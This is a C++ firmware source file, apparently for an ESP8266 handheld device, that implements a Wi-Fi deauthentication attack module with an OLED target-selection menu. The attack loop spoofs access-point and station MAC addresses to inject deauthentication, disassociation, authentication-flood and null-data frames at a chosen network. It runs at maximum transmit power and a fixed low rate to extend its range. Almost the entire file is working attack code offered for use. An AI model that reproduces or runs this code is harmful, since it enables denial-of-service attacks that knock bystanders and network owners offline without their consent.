#include "deauth.h"
#include "scanner.h" // Need access to ap_list, sta_list, etc.
#include "ui.h"      // For drawing and state access
#include "utils.h"   // For macToString
#include <U8g2lib.h> // For OLED drawing
#include "config.h"  // <<< Add this for SCREEN_WIDTH, SCREEN_HEIGHT
#include <algorithm> // For std::min if needed later

// --- Declare SDK functions needed ---
extern "C" {
    #include "user_interface.h" // Already included indirectly? Still good practice.
    // Declare the function prototype directly instead of including phy_info.h
    void system_phy_set_max_tpw(uint8 max_tpw);
    int wifi_set_user_fixed_rate(uint8_t enable_mask, uint8_t rate);
    // wifi_send_pkt_freedom is also declared in deauth.h
}

// --- Global Variable Definitions ---
uint8_t deauth_target_ap_bssid[6] = {0};
uint8_t deauth_target_sta_mac[6] = {0};
char deauth_target_ap_ssid[33] = {0};
bool deauth_attack_active = false;

// --- Constant Definitions ---
const uint8_t broadcast_mac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}; // <<< DEFINE as const array

// --- V1 Attack Constants & Variables ---
const uint8_t ATTACK_MODES = 8;
const unsigned long ATTACK_CHANGE_INTERVAL = 100; // ms between attack technique changes (FASTER CYCLE)
const int PACKET_REPEAT_COUNT = 20; // <<< REDUCED: Send fewer packets per burst
const uint8_t NUM_REASONS = 12;
const uint8_t reason_codes[NUM_REASONS] = {
  1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
};
uint8_t current_attack_mode = 0; // <<< REMOVE static to make it externally visible
static unsigned long last_attack_change = 0;
static uint16_t deauth_seq_num = 0; // Sequence number moved here
static unsigned long last_packet_rate_update = 0; // <<< DECLARE the variable

// --- Internal State ---
static DeauthStateType currentDeauthState = DeauthStateType::SELECT_AP;
static int selected_ap_index = 0; // Index within the *scanner's* ap_list
static int ap_display_offset = 0; // <<< Add offset for AP list scrolling
static int selected_sta_index = 0; // Index within the filtered list for the selected AP
static int sta_display_offset = 0; // <<< Add offset for STA list scrolling
static uint8_t target_channel = 1; // Channel of the target AP
static uint32_t packets_sent = 0;

// Filtered list of stations for the selected AP
static StationInfo stations_of_selected_ap[MAX_STAS_PER_AP];
static uint8_t stations_of_selected_ap_count = 0;
static const int BROADCAST_STA_INDEX = 0; // Index 0 in the STA list will represent Broadcast

// --- External UI Elements ---
extern U8G2_SSD1306_128X64_NONAME_F_HW_I2C oled;
extern bool needsRedraw;
extern UIState currentState; // <<< Make sure this is extern (needed for state changes)
extern int currentMenuIndex; // <<< Make sure this is extern (needed for state changes)
extern uint8_t current_channel; // <<< CORRECT TYPE: Match scanner.h (uint8_t)

// --- V1 Packet Structures ---
typedef struct {
    frame_control_t frame_control;
    uint16_t duration_id;
    uint8_t addr1[6];
    uint8_t addr2[6];
    uint8_t addr3[6];
    uint16_t seq_ctrl;
    uint16_t reason_code; // Reason for deauthentication
} deauth_packet_t;

typedef struct {
    frame_control_t frame_control;
    uint16_t duration_id;
    uint8_t addr1[6];
    uint8_t addr2[6];
    uint8_t addr3[6];
    uint16_t seq_ctrl;
    uint16_t reason_code; // Reason for disassociation
} disassoc_packet_t;

typedef struct {
    frame_control_t frame_control;
    uint16_t duration_id;
    uint8_t addr1[6];
    uint8_t addr2[6];
    uint8_t addr3[6];
    uint16_t seq_ctrl;
    uint16_t auth_alg;
    uint16_t auth_seq;
    uint16_t status_code;
} auth_packet_t;

typedef struct {
    frame_control_t frame_control;
    uint16_t duration_id;
    uint8_t addr1[6];
    uint8_t addr2[6];
    uint8_t addr3[6];
    uint16_t seq_ctrl;
    uint16_t cap_info;
    uint16_t listen_interval;
    uint8_t current_ap_mac[6]; // Added field for Reassoc Req
    // Optional: Add SSID element, Supported Rates element if needed
} reassoc_req_packet_t; // Note: V1 used fixed size, this is more structured

typedef struct {
    frame_control_t frame_control;
    uint16_t duration_id;
    uint8_t addr1[6];
    uint8_t addr2[6];
    uint8_t addr3[6];
    uint16_t seq_ctrl;
    uint16_t cap_info;
    uint16_t listen_interval;
    uint8_t current_ap_mac[6]; // Added field for Reassoc Req
    // Optional: Add SSID element, Supported Rates element if needed
} null_data_packet_t;
// --- End V1 Packet Structures ---

// --- V1 Packet Templates (will be populated dynamically) ---
static uint8_t deauth_packet_buffer[sizeof(deauth_packet_t)];
static uint8_t disassoc_packet_buffer[sizeof(disassoc_packet_t)];
static uint8_t auth_packet_buffer[sizeof(auth_packet_t)];
static uint8_t null_packet_buffer[sizeof(null_data_packet_t)];

// --- Utility function needed by V1 logic ---
void utils_random_mac(uint8_t* mac) {
  for (int i = 0; i < 6; i++) {
    mac[i] = random(0, 256);
  }
  mac[0] &= 0xFE; // Ensure unicast address (first byte, second LSB is 0)
  mac[0] |= 0x02; // Ensure locally administered address (first byte, second MSB is 1) - common practice
}

// <<< --- Forward Declarations --- >>>
void filter_stations_for_ap();
void send_packet_burst(uint8_t* packet, size_t packet_size, int count, bool change_seq);
// <<< --- End Forward Declarations --- >>>

// --- Initialization ---
void deauth_init() {
    Serial.println("Deauth Module Initialized.");
    currentDeauthState = DeauthStateType::SELECT_AP;
    deauth_attack_active = false;
    selected_ap_index = 0; // Start selection at the first AP found by scanner
    selected_sta_index = 0;
    packets_sent = 0;
    memset(deauth_target_ap_bssid, 0, 6);
    memset(deauth_target_sta_mac, 0, 6);
    memset(deauth_target_ap_ssid, 0, 33);
    stations_of_selected_ap_count = 0;

    // Set WiFi mode (should already be STA from main setup, but good practice)
    // wifi_set_opmode(STATION_MODE); // Already done in main setup

    // Enable promiscuous mode for packet sniffing/injection
    // wifi_promiscuous_enable(0); // Disable first? Maybe not needed.
    // wifi_promiscuous_enable(1); // <<< COMMENT THIS OUT FOR NOW
    // Serial.println("Deauth Init: Enabling promiscuous mode."); // <<< COMMENT THIS OUT

    // <<< Set Maximum Transmit Power >>>
    Serial.println("Deauth Init: Setting max TX power (82)...");
    system_phy_set_max_tpw(82); // Call the function (it returns void)
    // We can't directly check success, assume it worked if no crash.
    Serial.println("  Max TX power set command issued.");
    // <<< End Set Max TX Power >>>

    // <<< Set Fixed Rate (like V1 might have implicitly done) >>>
    // Mask 0x3F enables all rates (1, 2, 5.5, 11, 6, 9, 12, 18, 24, 36, 48, 54 Mbps)
    // Rate 1 (1 Mbps) often gives best range/penetration for attacks
    Serial.println("Deauth Init: Setting fixed rate (1 Mbps)...");
    int rate_result = wifi_set_user_fixed_rate(0x3F, 1);
    Serial.printf("  wifi_set_user_fixed_rate result: %d\n", rate_result);
    // <<< End Set Fixed Rate >>>

    // Ensure scanner has run and found some APs
    if (ap_count == 0) {
        Serial.println("WARN: No APs found by scanner. Deauth may not work.");
        // Optionally switch back to main menu or show an error on screen
    }
    needsRedraw = true;
}

// --- Stop Deauth Module/Attack ---
void deauth_stop() {
    Serial.println("Deauth Module Stopped.");
    deauth_attack_active = false;
    // Optional: Disable promiscuous mode if no other module needs it immediately
    // wifi_promiscuous_enable(0);
    // Serial.println("Deauth Stop: Disabled promiscuous mode.");
    needsRedraw = true;
}

// --- Main Update Loop ---
void deauth_update() {
    if (currentDeauthState != DeauthStateType::ATTACKING || !deauth_attack_active) {
        return;
    }

    unsigned long current_time = millis();

    // <<< Log Current Channel Periodically >>>
    static unsigned long last_channel_check = 0;
    if (current_time - last_channel_check > 1000) { // Check every second
        uint8_t actual_channel = wifi_get_channel();
        if (actual_channel != target_channel) {
            Serial.printf("!!! WARNING: Channel mismatch! Expected: %d, Actual: %d\n", target_channel, actual_channel);
            // Optional: Force channel back? Might conflict with other modules if not careful.
            // wifi_set_channel(target_channel);
        } else {
             Serial.printf("Deauth Update: Channel OK (%d)\n", actual_channel); // <<< Confirm channel
        }
        last_channel_check = current_time;
    }
    // <<< End Log Current Channel >>>

    // --- Cycle through attack modes ---
    if (current_time - last_attack_change > ATTACK_CHANGE_INTERVAL) {
        current_attack_mode = (current_attack_mode + 1) % ATTACK_MODES;
        last_attack_change = current_time;
        Serial.printf("Changed attack mode to %d\n", current_attack_mode); // <<< Log mode change
    }

    // --- Select Target Station MAC ---
    const uint8_t* target_sta_mac;
    if (selected_sta_index == BROADCAST_STA_INDEX) {
        target_sta_mac = broadcast_mac;
    } else {
        int actual_sta_list_index = selected_sta_index - 1;
        if (actual_sta_list_index >= 0 && actual_sta_list_index < stations_of_selected_ap_count) {
            target_sta_mac = stations_of_selected_ap[actual_sta_list_index].mac;
        } else {
            // Fallback to broadcast if index is somehow invalid
            target_sta_mac = broadcast_mac;
            // Serial.println("WARN: Invalid STA index during attack, using broadcast."); // Optional debug
        }
    }

    // --- Execute Current Attack Mode ---
    uint8_t reason = reason_codes[random(0, NUM_REASONS)]; // Pick a random reason code
    uint16_t reason_code_16 = reason; // Convert 1-byte reason to 2-byte variable

    yield(); // <<< ADD yield() in the main attack loop between bursts

    switch (current_attack_mode) {
        case 0: // Deauth Broadcast (AP -> Broadcast)
        case 1: // Disassoc Broadcast (AP -> Broadcast)
            {
                uint8_t* packet_buffer = (current_attack_mode == 0) ? deauth_packet_buffer : disassoc_packet_buffer;
                size_t packet_size = (current_attack_mode == 0) ? sizeof(deauth_packet_t) : sizeof(disassoc_packet_t);
                uint8_t subtype = (current_attack_mode == 0) ? 12 : 10; // 12=Deauth, 10=Disassoc

                // Build packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 0; // Management
                fc.subtype = subtype;
                memcpy(packet_buffer, &fc, sizeof(frame_control_t)); // Frame Control
                uint16_t duration = 0x013a; // Or 0
                memcpy(packet_buffer + 2, &duration, 2); // Duration
                memcpy(packet_buffer + 4, broadcast_mac, 6); // Addr1 (Destination)
                memcpy(packet_buffer + 10, deauth_target_ap_bssid, 6); // Addr2 (Source = AP)
                memcpy(packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (BSSID)
                // Sequence number (bytes 22-23) set by send_packet_burst
                memcpy(packet_buffer + 24, &reason_code_16, 2); // Reason Code (2 bytes)

                send_packet_burst(packet_buffer, packet_size, PACKET_REPEAT_COUNT, true);
                packets_sent += PACKET_REPEAT_COUNT;
            }
            break;

        case 2: // Deauth Target STA (AP -> STA)
        case 3: // Disassoc Target STA (AP -> STA)
            if (target_sta_mac != broadcast_mac) { // Only if not broadcast
                uint8_t* packet_buffer = (current_attack_mode == 2) ? deauth_packet_buffer : disassoc_packet_buffer;
                size_t packet_size = (current_attack_mode == 2) ? sizeof(deauth_packet_t) : sizeof(disassoc_packet_t);
                uint8_t subtype = (current_attack_mode == 2) ? 12 : 10;

                // Build packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 0; // Management
                fc.subtype = subtype;
                memcpy(packet_buffer, &fc, sizeof(frame_control_t));
                uint16_t duration = 0x013a;
                memcpy(packet_buffer + 2, &duration, 2);
                memcpy(packet_buffer + 4, target_sta_mac, 6); // Addr1 (Destination = STA)
                memcpy(packet_buffer + 10, deauth_target_ap_bssid, 6); // Addr2 (Source = AP)
                memcpy(packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (BSSID)
                memcpy(packet_buffer + 24, &reason_code_16, 2); // Reason Code (2 bytes)

                send_packet_burst(packet_buffer, packet_size, PACKET_REPEAT_COUNT, true);
                packets_sent += PACKET_REPEAT_COUNT;
            }
            break;

        case 4: // Deauth from random MACs to target STA/Broadcast
            {
                uint8_t random_mac[6];
                utils_random_mac(random_mac); // <<< CALL the function defined earlier >>>

                // Build Deauth packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 0; // Management
                fc.subtype = 12; // Deauth
                memcpy(deauth_packet_buffer, &fc, sizeof(frame_control_t));
                uint16_t duration = 0x013a;
                memcpy(deauth_packet_buffer + 2, &duration, 2);
                memcpy(deauth_packet_buffer + 4, target_sta_mac, 6); // Addr1 (Destination = STA/Broadcast)
                memcpy(deauth_packet_buffer + 10, random_mac, 6); // Addr2 (Source = Random)
                memcpy(deauth_packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (BSSID = Target AP)
                memcpy(deauth_packet_buffer + 24, &reason_code_16, 2); // Reason Code (2 bytes)

                send_packet_burst(deauth_packet_buffer, sizeof(deauth_packet_t), PACKET_REPEAT_COUNT / 2, true); // Fewer repeats for this mode
                packets_sent += PACKET_REPEAT_COUNT / 2;
            }
            break;

        case 5: // Auth flood to AP (from random MACs)
            {
                uint8_t random_mac[6];
                utils_random_mac(random_mac);

                // Build Auth packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 0; // Management
                fc.subtype = 11; // Auth
                memcpy(auth_packet_buffer, &fc, sizeof(frame_control_t));
                uint16_t duration = 0x013a;
                memcpy(auth_packet_buffer + 2, &duration, 2);
                memcpy(auth_packet_buffer + 4, deauth_target_ap_bssid, 6); // Addr1 (Destination = AP)
                memcpy(auth_packet_buffer + 10, random_mac, 6); // Addr2 (Source = Random)
                memcpy(auth_packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (BSSID = AP)
                uint16_t auth_alg = 0; // Open System
                uint16_t auth_seq = 1;
                uint16_t status_code = 0; // Success (or try other codes?)
                memcpy(auth_packet_buffer + 24, &auth_alg, 2);
                memcpy(auth_packet_buffer + 26, &auth_seq, 2);
                memcpy(auth_packet_buffer + 28, &status_code, 2);

                send_packet_burst(auth_packet_buffer, sizeof(auth_packet_t), PACKET_REPEAT_COUNT / 2, true);
                packets_sent += PACKET_REPEAT_COUNT / 2;
            }
            break;

        case 6: // Null data flood (AP -> STA/Broadcast) - Can disrupt power save
            {
                // Build Null Data packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 2; // Data
                fc.subtype = 4; // Null Data (no data)
                // Set ToDS=1, FromDS=0 if AP->STA
                fc.flags = 0b00000001; // ToDS=1
                memcpy(null_packet_buffer, &fc, sizeof(frame_control_t));
                uint16_t duration = 0;
                memcpy(null_packet_buffer + 2, &duration, 2);
                memcpy(null_packet_buffer + 4, deauth_target_ap_bssid, 6); // Addr1 (RA = AP BSSID)
                memcpy(null_packet_buffer + 10, target_sta_mac, 6); // Addr2 (TA = STA/Broadcast)
                memcpy(null_packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (DA = AP BSSID) - Check 802.11 address fields for ToDS=1

                send_packet_burst(null_packet_buffer, sizeof(null_data_packet_t), PACKET_REPEAT_COUNT, true);
                packets_sent += PACKET_REPEAT_COUNT;
            }
            break;

        case 7: // Deauth Target STA (STA -> AP - Spoofed)
            if (target_sta_mac != broadcast_mac) { // Only if not broadcast
                // Build Deauth packet
                frame_control_t fc = {0};
                fc.protocol_version = 0;
                fc.type = 0; // Management
                fc.subtype = 12; // Deauth
                memcpy(deauth_packet_buffer, &fc, sizeof(frame_control_t));
                uint16_t duration = 0x013a;
                memcpy(deauth_packet_buffer + 2, &duration, 2);
                memcpy(deauth_packet_buffer + 4, deauth_target_ap_bssid, 6); // Addr1 (Destination = AP)
                memcpy(deauth_packet_buffer + 10, target_sta_mac, 6); // Addr2 (Source = STA)
                memcpy(deauth_packet_buffer + 16, deauth_target_ap_bssid, 6); // Addr3 (BSSID)
                memcpy(deauth_packet_buffer + 24, &reason_code_16, 2); // Reason Code (2 bytes)

                send_packet_burst(deauth_packet_buffer, sizeof(deauth_packet_t), PACKET_REPEAT_COUNT, true);
                packets_sent += PACKET_REPEAT_COUNT;
            }
            break;
    }
}

// --- Draw Deauth UI ---
void deauth_draw() {
    // Header is drawn by ui_update
    oled.setFont(u8g2_font_5x7_tf); // Use a smaller font

    char buffer[40];
    int yPos = 33; // Starting Y position for lists (consistent with scanner)
    int line_height = 8;
    const int items_to_display = 3; // Show 3 items per page (adjust based on font)
    const int lines_per_item_ap = 2; // APs take 2 lines
    const int gap_between_items = 1;
    const int item_block_height_ap = (line_height * lines_per_item_ap) + gap_between_items;
    const int item_block_height_sta = line_height + gap_between_items; // STAs take 1 line + gap

    int total_sta_options = stations_of_selected_ap_count + 1; // +1 for Broadcast

    switch (currentDeauthState) {
        case DeauthStateType::SELECT_AP:
            oled.drawStr(0, 23, "Select Target AP:");
            oled.drawHLine(0, 25, SCREEN_WIDTH);

            if (ap_count == 0) {
                oled.drawStr(10, 40, "No APs found!");
                oled.drawStr(10, 50, "Run Scanner first.");
            } else {
                // Draw AP list
                for (int i = 0; i < items_to_display; ++i) {
                    int current_item_index = ap_display_offset + i;
                    if (current_item_index >= ap_count) break;

                    AccessPointInfo* ap = &ap_list[current_item_index]; // Get AP from scanner list
                    bool is_selected = (current_item_index == selected_ap_index);
                    const char* select_char = is_selected ? ">" : " ";

                    // <<< --- Add Debug Print Here --- >>>
                    Serial.printf("Deauth Draw AP[%d]: SSID='%s', ssid[0]=%d (char:'%c')\n",
                                  current_item_index,
                                  ap->ssid,
                                  (int)ap->ssid[0],
                                  ap->ssid[0] ? ap->ssid[0] : '?'); // Print char if not null
                    // <<< --- End Debug Print --- >>>

                    // Line 1: Selection, SSID, Encryption
                    String encStr = encryption_to_string(ap->encryption);
                    snprintf(buffer, sizeof(buffer), "%s%-16.16s %s", select_char, ap->ssid[0] ? ap->ssid : "[Hidden]", encStr.c_str());
                    oled.drawStr(0, yPos, buffer);

                    // Line 2: BSSID, RSSI
                    snprintf(buffer, sizeof(buffer), " %s R:%d", macToString(ap->bssid).c_str(), ap->rssi);
                    oled.drawStr(0, yPos + line_height, buffer);

                    yPos += item_block_height_ap;
                }

                // Draw scroll indicators for AP list
                if (ap_count > items_to_display) {
                    if (ap_display_offset > 0) {
                        oled.drawTriangle(SCREEN_WIDTH - 6, 27, SCREEN_WIDTH - 9, 31, SCREEN_WIDTH - 3, 31); // Up arrow
                    }
                    if (ap_display_offset + items_to_display < ap_count) {
                        oled.drawTriangle(SCREEN_WIDTH - 6, SCREEN_HEIGHT - 1, SCREEN_WIDTH - 9, SCREEN_HEIGHT - 5, SCREEN_WIDTH - 3, SCREEN_HEIGHT - 5); // Down arrow
                    }
                }
            }
            break;

        case DeauthStateType::SELECT_STA:
            oled.drawStr(0, 23, "Select Target STA:");
            oled.drawHLine(0, 25, SCREEN_WIDTH);

            // Show selected AP SSID at the bottom for context
            snprintf(buffer, sizeof(buffer), "AP: %.20s", deauth_target_ap_ssid[0] ? deauth_target_ap_ssid : macToString(deauth_target_ap_bssid).c_str()); // Show BSSID if SSID empty
            oled.drawStr(0, SCREEN_HEIGHT - 1, buffer); // Draw at bottom line

            // Draw STA list (including Broadcast) - Single line per item
            for (int i = 0; i < items_to_display; ++i) {
                 int current_item_index = sta_display_offset + i;
                 if (current_item_index >= total_sta_options) break;

                 bool is_selected = (current_item_index == selected_sta_index);
                 const char* select_char = is_selected ? ">" : " ";

                 if (current_item_index == BROADCAST_STA_INDEX) {
                     // Draw Broadcast option
                     snprintf(buffer, sizeof(buffer), "%s Broadcast", select_char);
                     oled.drawStr(0, yPos, buffer);
                 } else {
                     // Draw actual Station MAC
                     int actual_sta_list_index = current_item_index - 1; // Adjust index for stations_of_selected_ap list
                     StationInfo* sta = &stations_of_selected_ap[actual_sta_list_index];
                     snprintf(buffer, sizeof(buffer), "%s %s R:%d", select_char, macToString(sta->mac).c_str(), sta->rssi);
                     oled.drawStr(0, yPos, buffer);
                 }
                 yPos += item_block_height_sta; // Use STA item height
            }

            // Draw scroll indicators for STA list
            if (total_sta_options > items_to_display) {
                if (sta_display_offset > 0) {
                    oled.drawTriangle(SCREEN_WIDTH - 6, 27, SCREEN_WIDTH - 9, 31, SCREEN_WIDTH - 3, 31); // Up arrow
                }
                if (sta_display_offset + items_to_display < total_sta_options) {
                    oled.drawTriangle(SCREEN_WIDTH - 6, SCREEN_HEIGHT - 8, SCREEN_WIDTH - 9, SCREEN_HEIGHT - 12, SCREEN_WIDTH - 3, SCREEN_HEIGHT - 12); // Down arrow (raised slightly due to AP name at bottom)
                }
            }
            break;

        case DeauthStateType::ATTACKING:
            oled.drawStr(0, 23, "Deauth Attack Active");
            oled.drawHLine(0, 25, SCREEN_WIDTH);
            // Show SSID if known, otherwise BSSID
            snprintf(buffer, sizeof(buffer), "AP: %s",
                     (strlen(deauth_target_ap_ssid) > 0) ? deauth_target_ap_ssid : macToString(deauth_target_ap_bssid).c_str());
            oled.drawStr(0, yPos, buffer);

            if (memcmp(deauth_target_sta_mac, broadcast_mac, 6) == 0) {
                snprintf(buffer, sizeof(buffer), "STA: Broadcast");
            } else {
                snprintf(buffer, sizeof(buffer), "STA: %s", macToString(deauth_target_sta_mac).c_str());
            }
            oled.drawStr(0, yPos + line_height, buffer);

            // Display the CURRENT channel being attacked in the loop, and total packets sent
            snprintf(buffer, sizeof(buffer), "Pkts: %lu Mode: %d", packets_sent, current_attack_mode);
            oled.drawStr(0, yPos + (line_height * 2), buffer);

            if (!deauth_attack_active) {
                oled.drawStr(SCREEN_WIDTH - 40, yPos + (line_height * 2), "[Paused]");
            }
            // Add hint for controls
            oled.setFont(u8g2_font_4x6_tf); // Even smaller font
            oled.drawStr(0, SCREEN_HEIGHT - 1, "Short:Pause/Run Long:Stop");
            break;
    }
}

// --- Handle Button Input for Deauth Mode ---
void deauth_handle_input(ButtonPressType pressType) {

    // <<< DEBUG: Print received press type >>>
    if (pressType != ButtonPressType::NO_PRESS) {
        Serial.printf("Deauth received pressType: %d (State: %d)\n", (int)pressType, (int)currentDeauthState);
    }
    // <<< End DEBUG >>>

    const int items_per_page = 2; // Items shown per screen

    switch (currentDeauthState) {
        case DeauthStateType::SELECT_AP:
            if (ap_count == 0 && pressType != ButtonPressType::LONG_PRESS) return; // Allow long press to exit

            if (pressType == ButtonPressType::SHORT_PRESS) {
                Serial.println("Deauth Select AP: Short Press -> Next AP"); // <<< DEBUG
                selected_ap_index = (selected_ap_index + 1) % ap_count;
                // Adjust display offset
                if (selected_ap_index < ap_display_offset) { // Wrap around top
                    ap_display_offset = selected_ap_index;
                } else if (selected_ap_index >= ap_display_offset + items_per_page) { // Scroll down
                    ap_display_offset = selected_ap_index - items_per_page + 1;
                }
                 // Ensure offset doesn't go past the last possible page start
                 if (ap_display_offset > ap_count - items_per_page && ap_count > items_per_page) {
                     ap_display_offset = ap_count - items_per_page;
                 }
                 if (ap_display_offset < 0) ap_display_offset = 0; // Should not happen, but safety check

                Serial.printf("Selected AP index: %d, Offset: %d\n", selected_ap_index, ap_display_offset);
                needsRedraw = true;
            } else if (pressType == ButtonPressType::LONG_PRESS) {
                 if (ap_count > 0) {
                    Serial.println("Deauth Select AP: Long Press -> Select AP, Go to STA Select"); // <<< DEBUG
                    // Select AP, store BSSID, SSID, Channel
                    // ... (copy AP data) ...
                    filter_stations_for_ap(); // Find stations for this AP
                    currentDeauthState = DeauthStateType::SELECT_STA;
                    selected_sta_index = 0; // Start at Broadcast
                    sta_display_offset = 0;
                 } else {
                    Serial.println("Deauth Select AP: Long Press -> Exit (No APs)"); // <<< DEBUG
                    // No APs to select, just exit back to main menu
                    currentState = UIState::MAIN_MENU;
                    currentMenuIndex = 0;
                 }
                needsRedraw = true;
            }
            break;

        case DeauthStateType::SELECT_STA:
             { // Braces for variable scope
                 int total_sta_options = stations_of_selected_ap_count + 1; // +1 for Broadcast

                 if (pressType == ButtonPressType::SHORT_PRESS) {
                     Serial.println("Deauth Select STA: Short Press -> Next STA/Broadcast"); // <<< DEBUG
                     // ... (increment selected_sta_index, handle offset) ...
                     needsRedraw = true;
                 } else if (pressType == ButtonPressType::LONG_PRESS) {
                     // Select STA/Broadcast and start attack
                     Serial.println("--- Starting Deauth Attack ---"); // <<< DEBUG
                     if (selected_sta_index == BROADCAST_STA_INDEX) {
                         Serial.println("Selected Target STA: Broadcast");
                         memcpy(deauth_target_sta_mac, broadcast_mac, 6);
                     } else {
                         int actual_sta_list_index = selected_sta_index - 1;
                         if (actual_sta_list_index >= 0 && actual_sta_list_index < stations_of_selected_ap_count) {
                             memcpy(deauth_target_sta_mac, stations_of_selected_ap[actual_sta_list_index].mac, 6);
                             Serial.printf("Selected Target STA: %s\n", macToString(deauth_target_sta_mac).c_str()); // <<< DEBUG
                         } else {
                             Serial.println("ERROR: Invalid selected station index! Defaulting to Broadcast.");
                             memcpy(deauth_target_sta_mac, broadcast_mac, 6);
                         }
                     }
                     // Log target AP details again just before attack start
                     Serial.printf("Target AP BSSID: %s\n", macToString(deauth_target_ap_bssid).c_str()); // <<< DEBUG
                     Serial.printf("Target AP SSID: %s\n", deauth_target_ap_ssid); // <<< DEBUG
                     Serial.printf("Target AP Channel: %d\n", target_channel); // <<< DEBUG

                     // Start attack state
                     currentDeauthState = DeauthStateType::ATTACKING;
                     deauth_attack_active = true;
                     packets_sent = 0;
                     current_attack_mode = 0; // Start with first attack mode
                     last_attack_change = millis(); // Reset attack mode timer
                     deauth_seq_num = 0; // Reset sequence number

                     // --- Set Channel ONCE to Target AP Channel ---
                     Serial.printf("Deauth Start: Setting channel to %d\n", target_channel);
                     wifi_set_channel(target_channel);
                     delay(5); // Small delay after channel set
                     // --- End Set Channel ONCE ---

                     Serial.println("Attack state entered (V1 Logic).");
                     needsRedraw = true;
                 }
             } // End braces for variable scope
             break;

        case DeauthStateType::ATTACKING:
            if (pressType == ButtonPressType::SHORT_PRESS) {
                // Toggle attack pause/resume
                deauth_attack_active = !deauth_attack_active;
                Serial.printf("Deauth Attack: Short Press -> %s\n", deauth_attack_active ? "Attack Resumed" : "Attack Paused"); // <<< DEBUG
                needsRedraw = true;
            } else if (pressType == ButtonPressType::LONG_PRESS) {
                // Stop attack and return to AP selection
                deauth_attack_active = false;
                Serial.println("Deauth Attack: Long Press -> Stopping Attack, Returning to AP Select");
                currentDeauthState = DeauthStateType::SELECT_AP;
                // Optional: Disable promiscuous mode here?
                // wifi_promiscuous_enable(0);
                // Serial.println("Deauth Stop Attack: Disabled promiscuous mode.");
                needsRedraw = true;
            }
            break;
    }
}

// --- Send Packet Burst (V1 Style) ---
void send_packet_burst(uint8_t* packet, size_t packet_size, int count, bool change_seq) {
    // Ensure packet size is reasonable
    if (packet_size < 24) { // Minimum size for MAC headers + sequence
        Serial.println("!!! ERROR: send_packet_burst - packet_size too small!");
        return;
    }

    // <<< Log packet details more often (e.g., once per mode change or periodically) >>>
    // This can be verbose, enable carefully
    // Serial.printf("send_packet_burst: Mode=%d, Size=%d, Count=%d\n", current_attack_mode, packet_size, count);
    // Serial.print("  Packet Hex: ");
    // for(size_t k=0; k<packet_size; ++k) Serial.printf("%02X ", packet[k]);
    // Serial.println();

    for (int i = 0; i < count; ++i) {
        if (change_seq) {
            // Update sequence number in the packet (bytes 22-23)
            uint16_t seq_ctrl = (deauth_seq_num++ << 4) | 0;
            if (deauth_seq_num >= 4096) deauth_seq_num = 0;
            memcpy(packet + 22, &seq_ctrl, 2);
        }

        // Send the packet
        int result = wifi_send_pkt_freedom(packet, packet_size, false); // Use sys_seq=false for manual sequence control

        // <<< Log EVERY failure >>>
        if (result != 0) {
            Serial.printf("!!! Mode %d: wifi_send_pkt_freedom failed (Result: %d) on burst %d\n", current_attack_mode, result, i);
            // Consider adding a small delay here if failures are constant, maybe buffer is full? delay(1);
        }

        // Minimal delay - V1 used DEAUTH_INTERVAL=0, but a tiny delay might help stability
        delayMicroseconds(100); // <<< INCREASED: Slightly longer delay between packets

        // Yield occasionally within the burst to prevent WDT reset
        if (i % 10 == 0) { // <<< Yield more often within the burst
             yield();
        }
    }
}

// --- Filter Stations for Selected AP ---
void filter_stations_for_ap() {
    stations_of_selected_ap_count = 0;
    if (selected_ap_index < 0 || selected_ap_index >= ap_count) return; // Safety check

    AccessPointInfo* target_ap = &ap_list[selected_ap_index];
    memcpy(deauth_target_ap_bssid, target_ap->bssid, 6);
    strncpy(deauth_target_ap_ssid, target_ap->ssid, 32);
    deauth_target_ap_ssid[32] = '\0'; // Ensure null termination
    target_channel = target_ap->channel;

    Serial.printf("Filtering stations for AP: %s (%s)\n", deauth_target_ap_ssid, macToString(deauth_target_ap_bssid).c_str());

    for (int i = 0; i < sta_count; ++i) {
        // Check if the station's associated AP BSSID matches the target AP's BSSID
        if (memcmp(sta_list[i].bssid_ap, deauth_target_ap_bssid, 6) == 0) {
            if (stations_of_selected_ap_count < MAX_STAS_PER_AP) {
                memcpy(&stations_of_selected_ap[stations_of_selected_ap_count], &sta_list[i], sizeof(StationInfo));
                stations_of_selected_ap_count++;
                Serial.printf("  Found matching STA: %s\n", macToString(sta_list[i].mac).c_str());
            } else {
                Serial.println("  Max stations for selected AP reached.");
                break; // Stop adding if the filtered list is full
            }
        }
    }
    Serial.printf("Found %d stations associated with the selected AP.\n", stations_of_selected_ap_count);
} 